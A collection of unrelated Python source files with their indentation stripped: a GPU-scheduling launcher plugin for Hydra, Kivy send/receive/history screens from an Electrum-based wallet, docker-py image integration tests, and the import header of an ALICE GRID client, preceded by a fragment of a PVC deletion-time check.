for del_time in pvc_deletion_time.values():
if del_time > accepted_pvc_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} {number_of_pvcs} PVCs deletion time is {pvc_deletion_time.values()} and is "
f"greater than {accepted_pvc_deletion_time} seconds"
)
logging.info(f"{msg_prefix} {number_of_pvcs} PVCs deletion times are:")
for name, a_time in pvc_deletion_time.items():
logging.info(f"{name} deletion time is: {a_time} seconds")
|
parallel_launcher.py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional, Sequence
from omegaconf import DictConfig, open_dict
from hydra.core.config_loader import ConfigLoader
from hydra.core.config_store import ConfigStore
from hydra.core.hydra_config import HydraConfig
from hydra.core.utils import (
JobReturn,
configure_log,
filter_overrides,
run_job,
setup_globals,
)
from hydra.plugins.launcher import Launcher
from hydra.types import TaskFunction
from IPython import embed
try:
import pynvml as nvidia_smi
except ImportError:
print("NVIDIA GPUs are not supported (pynvml unavailable)!")
import time
# from multiprocessing import Process
# import multiprocessing as mp
import multiprocess as mp # used because it serialises with dill rather than pickle (plain pickle chokes on hydra-wrapped functions)
# Remember: importing a module that accesses torch devices before the main decorator runs will raise an error...
# import torch.multiprocessing as mp
# mp.set_start_method('spawn', force=True)
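# A minimal sketch (illustrative, not part of this launcher) of why multiprocess is preferred here:
# the stdlib pickler used by multiprocessing rejects closures such as hydra-wrapped task functions,
# while multiprocess serialises them with dill:
#
#   import multiprocess as mp
#   def make_task(offset):
#       def task(x):
#           return x + offset   # a closure; plain multiprocessing may fail to pickle this under 'spawn'
#       return task
#   p = mp.Process(target=make_task(1), args=(41,))
#   p.start(); p.join()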
log = logging.getLogger(__name__)
def worker(fn, cfg, idx):
logging.info(f'Worker id: {idx}')
return fn(cfg)
@dataclass
class BasicLauncherConf:
_target_: str = "hydra_plugins.parallel_launcher.ParallelLauncher"
ConfigStore.instance().store(
group="hydra/launcher", name="gpu_parallel", node=BasicLauncherConf, provider="hydra"
)
class ParallelLauncher(Launcher):
def __init__(self) -> None:
super().__init__()
self.config: Optional[DictConfig] = None
self.config_loader: Optional[ConfigLoader] = None
self.task_function: Optional[TaskFunction] = None
def setup(
self,
config: DictConfig,
config_loader: ConfigLoader,
task_function: TaskFunction,
) -> None:
self.config = config
self.config_loader = config_loader
self.task_function = task_function
def launch(
self, job_overrides: Sequence[Sequence[str]], initial_job_idx: int
) -> Sequence[JobReturn]:
setup_globals()
assert self.config is not None
assert self.task_function is not None
assert self.config_loader is not None
configure_log(self.config.hydra.hydra_logging, self.config.hydra.verbose)
sweep_dir = self.config.hydra.sweep.dir
Path(str(sweep_dir)).mkdir(parents=True, exist_ok=True)
log.info(f"Launching {len(job_overrides)} jobs locally")
# Setup the parallel run. gpus_id is a list of (absolute) ids of the GPUs to use
jobs_started, started_programs, runs = [], [], []
nvidia_smi.nvmlInit()
try:
gpus_id = list(map(int, self.config.multirun.devices.split(",")))
except ValueError:
if self.config.multirun.devices == "all":
gpus_id = range(nvidia_smi.nvmlDeviceGetCount())
else:
raise RuntimeError("Use correct yaml to choose GPUs")
# TODO: this can be improved; the list of GPU handles should also carry their ids
gpus_real_stats = []
for gpu_id in gpus_id:
gpus_real_stats.append(nvidia_smi.nvmlDeviceGetHandleByIndex(gpu_id))
def get_gpus_usage(gpus_real_stats, cfg):
usage = []
if cfg.multirun.gpu_bottleneck == "usage":
for g in gpus_real_stats:
usage.append(nvidia_smi.nvmlDeviceGetUtilizationRates(g).gpu)
elif cfg.multirun.gpu_bottleneck == "memory":
for g in gpus_real_stats:
mem_res = nvidia_smi.nvmlDeviceGetMemoryInfo(g)
usage.append(100 * (mem_res.used / mem_res.total))
elif cfg.multirun.gpu_bottleneck == "tasks":
for g in gpus_real_stats:
usage.append(len(nvidia_smi.nvmlDeviceGetComputeRunningProcesses(g)))
else:
raise NotImplementedError("The scheduler does not support this bottleneck!!!")
return usage
def free_gpu(gpus_real_stats, cfg, gpus_id):
usage = get_gpus_usage(gpus_real_stats, cfg)
min_usage = usage.index(min(usage))
if usage[min_usage] >= cfg.multirun.max_usage:
return -1
else:
return gpus_id[min_usage]
# Setup loading threshold
self.config.multirun.max_usage = int(self.config.multirun.max_usage)
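# Scheduling loop: pick the least-loaded GPU; if every GPU is above max_usage, sleep and retry;
# otherwise start the next queued job on that GPU and wait wait_to_start_new_job seconds so the
# job can claim its memory before the next scheduling decision. Note that `runs` is returned
# empty below, because JobReturn objects are not collected from the child processes.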
while job_overrides:
next_free_gpu = free_gpu(gpus_real_stats, self.config, gpus_id)
print(f"Next gpus is {next_free_gpu}")
started_programs = []
if next_free_gpu == -1:
time.sleep(self.config.multirun.wait_for_next_available_gpu)
continue
else:
idx, overrides = len(jobs_started), job_overrides[0]
log.info("\t#{} : {}".format(idx, " ".join(filter_overrides(overrides))))
sweep_config = self.config_loader.load_sweep_config(self.config, list(overrides))
with open_dict(sweep_config):
sweep_config.hydra.job.id = idx
sweep_config.hydra.job.num = idx
HydraConfig().set_config(sweep_config)
# Insert the free GPU that is going to be used
sweep_config.device = f"cuda:{next_free_gpu}"
p = mp.Process(target=run_job, args=(sweep_config,
self.task_function,
"hydra.sweep.dir",
"hydra.sweep.subdir",))
p.start()
started_programs.append(p)
jobs_started.append(job_overrides.pop(0))
configure_log(self.config.hydra.hydra_logging, self.config.hydra.verbose)
time.sleep(self.config.multirun.wait_to_start_new_job)
for p in started_programs:
p.join()
return runs
# print("parallel_launcher_luca")
# embed()
#
# #####################
# runs: List[JobReturn] = []
# for idx, overrides in enumerate(job_overrides):
# idx = initial_job_idx + idx
# lst = " ".join(filter_overrides(overrides))
# log.info(f"\t#{idx} : {lst}")
# sweep_config = self.config_loader.load_sweep_config(
# self.config, list(overrides)
# )
# with open_dict(sweep_config):
# sweep_config.hydra.job.id = idx
# sweep_config.hydra.job.num = idx
# HydraConfig.instance().set_config(sweep_config)
# ret = run_job(
# config=sweep_config,
# task_function=self.task_function,
# job_dir_key="hydra.sweep.dir",
# job_subdir_key="hydra.sweep.subdir",
# )
# runs.append(ret)
# configure_log(self.config.hydra.hydra_logging, self.config.hydra.verbose)
# return runs
|
screens.py | import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from electrum.bitcoin import TYPE_ADDRESS
from electrum.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum import bitcoin, constants
from electrum.transaction import TxOutput, Transaction, tx_from_str
from electrum.util import send_exception_to_crash_reporter, parse_URI, InvalidBitcoinURI
from electrum.util import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT, TxMinedInfo, get_request_status, pr_expiration_values
from electrum.plugin import run_hook
from electrum.wallet import InternalAddressCorruption
from electrum import simple_config
from electrum.lnaddr import lndecode
from electrum.lnutil import RECEIVED, SENT, PaymentFailure
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
loaded = False
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def _change_action_view(self):
app = App.get_running_app()
action_bar = app.root.manager.current_screen.ids.action_bar
_action_view = self.action_view
if (not _action_view) or _action_view.parent:
return
action_bar.clear_widgets()
action_bar.add_widget(_action_view)
def on_enter(self):
# FIXME: use a proper event instead of relying on the screen's animation time
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
def update(self):
pass
@profiler
def load_screen(self):
self.screen = Builder.load_file('electrum/gui/kivy/uix/ui_screens/' + self.kvname + '.kv')
self.add_widget(self.screen)
self.loaded = True
self.update()
setattr(self.app, self.kvname + '_screen', self)
def on_activate(self):
if self.kvname and not self.loaded:
self.load_screen()
#Clock.schedule_once(lambda dt: self._change_action_view())
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
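# indexed by the integer `status` that wallet.get_tx_status() returns (see HistoryScreen.get_card below)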
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
txpos = tx_item['txpos']
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = "atlas://electrum/gui/kivy/theming/light/lightning"
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
txpos = tx_item['txpos_in_block'] or 0
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = "atlas://electrum/gui/kivy/theming/light/" + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
history = sorted(wallet.get_full_history(self.app.fx).values(), key=lambda x: x.get('timestamp') or float('inf'), reverse=True)
history_card = self.screen.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen):
kvname = 'send'
payment_request = None
payment_request_queued = None
parsed_URI = None
def set_URI(self, text):
if not self.app.wallet:
self.payment_request_queued = text
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.screen.address = uri.get('address', '')
self.screen.message = uri.get('message', '')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.payment_request = None
self.screen.is_lightning = False
def set_ln_invoice(self, invoice):
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.screen.address = invoice
self.screen.message = dict(lnaddr.tags).get('d', None)
self.screen.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.screen.is_lightning = True
def update(self):
if not self.loaded:
return
if self.app.wallet and self.payment_request_queued:
self.set_URI(self.payment_request_queued)
self.payment_request_queued = None
_list = self.app.wallet.get_invoices()
lnworker_logs = self.app.wallet.lnworker.logs if self.app.wallet.lnworker else {}
_list = [x for x in _list if x and x.get('status') != PR_PAID or x.get('rhash') in lnworker_logs]
payments_container = self.screen.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list]
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item):
invoice_type = item['type']
status, status_str = get_request_status(item) # convert to str
if invoice_type == PR_TYPE_LN:
key = item['rhash']
log = self.app.wallet.lnworker.logs.get(key)
if item['status'] == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
elif invoice_type == PR_TYPE_ONCHAIN:
key = item['id']
else:
raise Exception('unknown invoice type')
return {
'is_lightning': invoice_type == PR_TYPE_LN,
'is_bip70': 'bip70' in item,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item['message'],
'amount': self.app.format_amount_and_units(item['amount'] or 0),
}
def do_clear(self):
self.screen.amount = ''
self.screen.message = ''
self.screen.address = ''
self.payment_request = None
self.screen.locked = False
self.parsed_URI = None
def set_request(self, pr):
self.screen.address = pr.get_requestor()
amount = pr.get_amount()
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.screen.message = pr.get_memo()
self.screen.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
raw_tx = tx_from_str(data)
tx = Transaction(raw_tx)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
lower = data.lower()
if lower.startswith('lightning:ln'):
lower = lower[10:]
# try to decode as URI/address
if lower.startswith('ln'):
self.set_ln_invoice(lower)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.screen.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Tachacoin address or a payment request'))
return
if not self.screen.amount:
self.app.show_error(_('Please enter an amount'))
return
try:
amount = self.app.get_amount(self.screen.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.screen.amount)
return
message = self.screen.message
if self.screen.is_lightning:
return self.app.wallet.lnworker.parse_bech32_invoice(address)
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Tachacoin Address') + ':\n' + address)
return
outputs = [TxOutput(TYPE_ADDRESS, address, amount)]
return self.app.wallet.create_invoice(outputs, message, self.payment_request, self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self._do_pay_lightning(invoice)
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
do_pay = lambda rbf: self._do_pay_onchain(invoice, rbf)
if self.app.electrum_config.get('use_rbf'):
d = Question(_('Should this transaction be replaceable?'), do_pay)
d.open()
else:
do_pay(False)
else:
raise Exception('unknown invoice type')
def _do_pay_lightning(self, invoice):
attempts = 10
threading.Thread(target=self.app.wallet.lnworker.pay, args=(invoice['invoice'], invoice['amount'], attempts)).start()
def _do_pay_onchain(self, invoice, rbf):
# make unsigned transaction
outputs = invoice['outputs'] # type: List[TxOutput]
amount = sum(map(lambda x: x.value, outputs))
coins = self.app.wallet.get_spendable_coins(None)
try:
tx = self.app.wallet.make_unsigned_transaction(coins, outputs, None)
except NotEnoughFunds:
self.app.show_error(_("Not enough funds"))
return
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.app.show_error(repr(e))
return
if rbf:
tx.set_rbf(True)
fee = tx.get_fee()
msg = [
_("Amount to be sent") + ": " + self.app.format_amount_and_units(amount),
_("Mining fee") + ": " + self.app.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.app.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append(_("Additional fees") + ": " + self.app.format_amount_and_units(x_fee_amount))
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
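# FEERATE_WARNING_HIGH_FEE is a fee rate in sat per 1000 bytes, so it is scaled by the estimated
# transaction size before being compared with the absolute fee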
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
msg.append(_("Enter your PIN code to proceed"))
self.app.protected('\n'.join(msg), self.send_tx, (tx, invoice))
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx, invoice)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
def expiry(self):
return self.app.electrum_config.get('request_expiry', 3600) # 1 hour
def clear(self):
self.screen.address = ''
self.screen.amount = ''
self.screen.message = ''
self.screen.lnaddr = ''
def set_address(self, addr):
self.screen.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.screen.status = ''
if req:
self.screen.message = req.get('memo', '')
amount = req.get('amount')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.screen.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.screen.amount
if amount:
a, u = self.screen.amount.split()
assert u == self.app.base_unit
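# convert the displayed amount to the base integer unit, e.g. with decimal_point() == 5 (mBTC)
# '1.2 mBTC' becomes Decimal('1.2') * 10**5 = 120000 satoshis (illustrative values)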
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.screen.address, amount, self.screen.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.screen.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.screen.message
if lightning:
key = self.app.wallet.lnworker.add_request(amount, message, self.expiry())
else:
addr = self.screen.address or self.app.wallet.get_unused_address()
if not addr:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.screen.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req):
is_lightning = req.get('type') == PR_TYPE_LN
if not is_lightning:
address = req['address']
key = address
else:
key = req['rhash']
address = req['invoice']
amount = req.get('amount')
description = req.get('memo', '')
status, status_str = get_request_status(req)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description
ci['status'] = status_str
ci['is_expired'] = status == PR_EXPIRED
return ci
def update(self):
if not self.loaded:
return
_list = self.app.wallet.get_sorted_requests()
requests_container = self.screen.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list if item.get('status') != PR_PAID]
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
def clear_requests_dialog(self):
requests = self.app.wallet.get_sorted_requests()
expired = [req for req in requests if get_request_status(req)[0] == PR_EXPIRED]
if len(expired) == 0:
return
def callback(c):
if c:
for req in expired:
key = req.get('rhash') or req['address']
self.app.wallet.delete_request(key)
self.update()
d = Question(_('Delete expired requests?'), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
image_test.py | import contextlib
import json
import shutil
import socket
import tarfile
import tempfile
import threading
import pytest
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
import docker
from .. import helpers
BUSYBOX = helpers.BUSYBOX
class ListImagesTest(helpers.BaseTestCase):
def test_images(self):
res1 = self.client.images(all=True)
self.assertIn('Id', res1[0])
res10 = res1[0]
self.assertIn('Created', res10)
self.assertIn('RepoTags', res10)
distinct = []
for img in res1:
if img['Id'] not in distinct:
distinct.append(img['Id'])
self.assertEqual(len(distinct), self.client.info()['Images'])
def test_images_quiet(self):
res1 = self.client.images(quiet=True)
self.assertEqual(type(res1[0]), six.text_type)
class PullImageTest(helpers.BaseTestCase):
def test_pull(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
res = self.client.pull('hello-world')
self.tmp_imgs.append('hello-world')
self.assertEqual(type(res), six.text_type)
self.assertGreaterEqual(
len(self.client.images('hello-world')), 1
)
img_info = self.client.inspect_image('hello-world')
self.assertIn('Id', img_info)
def test_pull_streaming(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
stream = self.client.pull('hello-world', stream=True)
self.tmp_imgs.append('hello-world')
for chunk in stream:
if six.PY3:
chunk = chunk.decode('utf-8')
json.loads(chunk) # ensure chunk is a single, valid JSON blob
self.assertGreaterEqual(
len(self.client.images('hello-world')), 1
)
img_info = self.client.inspect_image('hello-world')
self.assertIn('Id', img_info)
class CommitTest(helpers.BaseTestCase):
def test_commit(self):
container = self.client.create_container(BUSYBOX, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
self.assertIn('Id', res)
img_id = res['Id']
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
self.assertIn('Container', img)
self.assertTrue(img['Container'].startswith(id))
self.assertIn('ContainerConfig', img)
self.assertIn('Image', img['ContainerConfig'])
self.assertEqual(BUSYBOX, img['ContainerConfig']['Image'])
busybox_id = self.client.inspect_image(BUSYBOX)['Id']
self.assertIn('Parent', img)
self.assertEqual(img['Parent'], busybox_id)
class RemoveImageTest(helpers.BaseTestCase):
def test_remove(self):
container = self.client.create_container(BUSYBOX, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
self.assertIn('Id', res)
img_id = res['Id']
self.tmp_imgs.append(img_id)
self.client.remove_image(img_id, force=True)
images = self.client.images(all=True)
res = [x for x in images if x['Id'].startswith(img_id)]
self.assertEqual(len(res), 0)
class ImportImageTest(helpers.BaseTestCase):
'''Base class for `docker import` test cases.'''
TAR_SIZE = 512 * 1024
def write_dummy_tar_content(self, n_bytes, tar_fd):
def extend_file(f, n_bytes):
f.seek(n_bytes - 1)
f.write(bytearray([65]))
f.seek(0)
tar = tarfile.TarFile(fileobj=tar_fd, mode='w')
with tempfile.NamedTemporaryFile() as f:
extend_file(f, n_bytes)
tarinfo = tar.gettarinfo(name=f.name, arcname='testdata')
tar.addfile(tarinfo, fileobj=f)
tar.close()
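# Note (illustrative, not part of the original source): extend_file() creates an
# n_bytes file cheaply by seeking to offset n_bytes - 1 and writing a single
# 'A' (0x41), so the tar ends up with one 'testdata' member of exactly n_bytes.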
@contextlib.contextmanager
def dummy_tar_stream(self, n_bytes):
'''Yields a stream that is valid tar data of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file
@contextlib.contextmanager
def dummy_tar_file(self, n_bytes):
'''Yields the name of a valid tar file of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file.name
def test_import_from_bytes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
# The generic import_image() function cannot import in-memory bytes
# data that happens to be represented as a string type, because
# import_image() will try to use it as a filename and usually then
# trigger an exception. So we test the import_image_from_data()
# function instead.
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_file(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
# statuses = self.client.import_image(
# src=tar_filename, repository='test/import-from-file')
statuses = self.client.import_image_from_file(
tar_filename, repository='test/import-from-file')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_stream(self):
with self.dummy_tar_stream(n_bytes=self.TAR_SIZE) as tar_stream:
statuses = self.client.import_image(
src=tar_stream, repository='test/import-from-stream')
# statuses = self.client.import_image_from_stream(
# tar_stream, repository='test/import-from-stream')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
@contextlib.contextmanager
def temporary_http_file_server(self, stream):
'''Serve data from an IO stream over HTTP.'''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/x-tar')
self.end_headers()
shutil.copyfileobj(stream, self.wfile)
server = socketserver.TCPServer(('', 0), Handler)
thread = threading.Thread(target=server.serve_forever)
thread.setDaemon(True)
thread.start()
yield 'http://%s:%s' % (socket.gethostname(), server.server_address[1])
server.shutdown()
@pytest.mark.skipif(True, reason="Doesn't work inside a container - FIXME")
def test_import_from_url(self):
# The crappy test HTTP server doesn't handle large files well, so use
# a small file.
tar_size = 10240
with self.dummy_tar_stream(n_bytes=tar_size) as tar_data:
with self.temporary_http_file_server(tar_data) as url:
statuses = self.client.import_image(
src=url, repository='test/import-from-url')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
|
alien.py | #!/usr/bin/env python3
"""Executable/module for interaction with GRID services of ALICE experiment"""
import sys
if sys.version_info[0] != 3 or sys.version_info[1] < 6:
print("This packages requires a minimum of Python version 3.6", file=sys.stderr, flush = True)
sys.exit(1)
import os
import atexit
import re
import subprocess
import signal
import json
import traceback
import logging
import ssl
import uuid
import statistics
import collections
import multiprocessing as mp
from typing import Union
from typing import NamedTuple
import shlex
import tempfile
import time
import datetime
from pathlib import Path
from urllib.parse import urlparse
import urllib.request as urlreq
import socket
import threading
import asyncio
import pwd
import grp
import xml.dom.minidom
import xml.etree.ElementTree as ET
import zipfile
if not os.getenv('ALIENPY_NO_STAGGER'):
try:
import async_stagger
except Exception as e:
print("async_stagger module could not be load", file=sys.stderr, flush = True)
sys.exit(1)
try:
import OpenSSL
except Exception as e:
print("websockets module could not be load", file=sys.stderr, flush = True)
sys.exit(1)
try:
import websockets
from websockets.extensions import permessage_deflate as _wb_permessage_deflate
except Exception as e:
print("websockets module could not be load", file=sys.stderr, flush = True)
sys.exit(1)
try:
from XRootD import client as xrd_client
_HAS_XROOTD = True
except Exception as e:
_HAS_XROOTD = False
try:
import rich
from rich.pretty import pprint
except Exception as e:
print("rich module could not be load", file=sys.stderr, flush = True)
try:
import readline as rl
_HAS_READLINE = True
except ImportError:
try:
import gnureadline as rl
_HAS_READLINE = True
except ImportError:
_HAS_READLINE = False
deque = collections.deque
ALIENPY_VERSION_DATE = '20211202_153804'
ALIENPY_VERSION_STR = '1.3.7'
ALIENPY_EXECUTABLE = ''
##################################################
# GLOBAL POINTER TO WB CONNECTION #############
__SESSION_WB = None
##################################################
_HAS_TTY = sys.stdout.isatty()
_HAS_COLOR = _HAS_TTY # if it has tty then it supports colors
_NCPU = mp.cpu_count()
REGEX_PATTERN_TYPE = type(re.compile('.'))
guid_regex = re.compile('[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}', re.IGNORECASE) # regex for identification of GUIDs
cmds_split = re.compile(';|\n') # regex for splitting chained commands
specs_split = re.compile('@|,') # regex for splitting the specification of cp command
lfn_prefix_re = re.compile('(alien|file){1}(:|/{2})+') # regex for identification of lfn prefix
ignore_comments_re = re.compile('^\\s*(#|;|//)+', re.MULTILINE) # identify a range of comments
